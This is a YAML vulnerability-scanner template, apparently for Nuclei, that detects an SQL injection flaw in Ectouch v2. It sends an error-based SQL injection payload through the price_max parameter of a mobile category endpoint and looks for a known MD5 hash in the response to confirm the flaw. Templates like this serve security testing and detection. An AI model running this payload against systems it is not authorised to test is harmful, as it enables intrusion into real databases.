26 lines
692 B
YAML
26 lines
692 B
YAML
id: etouch-v2-sqli
|
|
info:
|
|
name: Ectouch v2 SQL Injection
|
|
author: princechaddha
|
|
severity: high
|
|
tags: etouch,sqli
|
|
reference:
|
|
- https://github.com/mstxq17/CodeCheck/
|
|
- https://www.anquanke.com/post/id/168991
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "c4ca4238a0b923820dcc509a6f75849b"
|
|
part: body
|